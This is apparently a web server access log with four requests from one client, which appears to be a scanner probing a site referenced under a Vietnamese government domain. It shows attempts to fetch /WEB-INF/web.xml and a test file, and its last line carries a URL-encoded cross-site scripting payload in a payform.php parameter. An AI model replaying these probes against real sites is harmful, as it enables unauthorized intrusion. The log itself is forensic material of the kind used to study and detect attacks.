2023-10-13 23:58:49 103.153.214.94 POST /app/options.py - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 https://bcvt.kontum.gov.vn/app/login.py 405 0 1 207
2023-10-13 23:59:01 103.153.214.94 GET /WEB-INF/web.xml - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 200 0 0 204
2023-10-13 23:59:12 103.153.214.94 GET /test.txt - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 200 0 0 632
2023-10-13 23:59:23 103.153.214.94 GET /payform.php type=upgrade&upgradeid=1&upgradegd=6&price=123&t=1&note=%3C/textarea%3E%3Cscript%3Ealert(document.domain)%3C/script%3E 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 200 0 0 205